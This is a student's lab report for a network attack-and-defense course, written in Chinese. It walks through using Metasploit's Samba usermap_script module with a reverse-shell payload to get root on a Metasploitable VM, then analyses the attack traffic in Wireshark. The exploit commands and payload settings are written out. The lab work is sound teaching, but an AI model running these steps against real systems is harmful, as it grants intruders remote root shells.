20211913-冯馨茹-2021-2022-2 《网络攻防实践》第七次实验
一、实验内容
(1)使用Metasploit进行Linux远程渗透攻击
任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。实践步骤如下:
①启动Metasploit软件,使用msfconsole;
②使用exploit:exploit渗透攻击模块;
③选择攻击PAYLOAD为远程shell,;
④设置渗透攻击参数;
⑤执行渗透攻击;
⑥查看是否正确得到远程Shell,并查看获得的权限。
(2)实践作业:攻防对抗实践
-
攻击方:使用 Metasploit (192.168.200.123),选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。
-
防守方:使用 wireshark监听获得网络攻击的数据包文件,结合 wireshark分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。
二、实验步骤
使用Metasploit进行Linux远程渗透攻击
| 虚拟机 | IP地址 |
|---|---|
| kali | 192.168.200.4 |
| Metasploitable | 192.168.200.123 |
首先,在虚拟机kali中通过命令msfconsole启动渗透软件

输入命令search usermap来搜索漏洞,可以看出这是针对这个漏洞的渗透攻击模块。

使用命令use exploit/multi/samba/usermap_script来进行对应脚本的攻击

输入命令show payloads来获取攻击负载模块,并选择攻击负载模块

输入命令set PAYLOAD cmd/unix/reverse来设置有效的攻击载荷。 再输入set rhost 192.168.200.123设置靶机地址,使用命令set lhost 192.168.200.4设置攻击机地址

使用指令show options查看payload状态,看信息设置是否正确,截图如下

使用指令exploit来执行攻击,攻击成功后使用指令whoami发现执行权限是root,使用指令ifconfig来查看靶机网络状态。

攻防对抗实践
还是选择上一个实践中的漏洞,攻击过程同上 ,用wireshark来抓取查看

在数据包中攻击方攻击使用的端口都在139
查看第一个数据包,在信息栏中可以看到,攻击发起时间是2022 08:55:37

在第一个shellcode中,可以看到攻击成功建立连接。

在进一步追踪tcp数据流,可以成功看到本地执行命令的信息。

三、学习中遇到的问题及解决
shellcode比较难找,跟同学一起讨论找到了。
四、学习感想与体会
这次实验相对步骤较少,完成的比较快。

浙公网安备 33010602011771号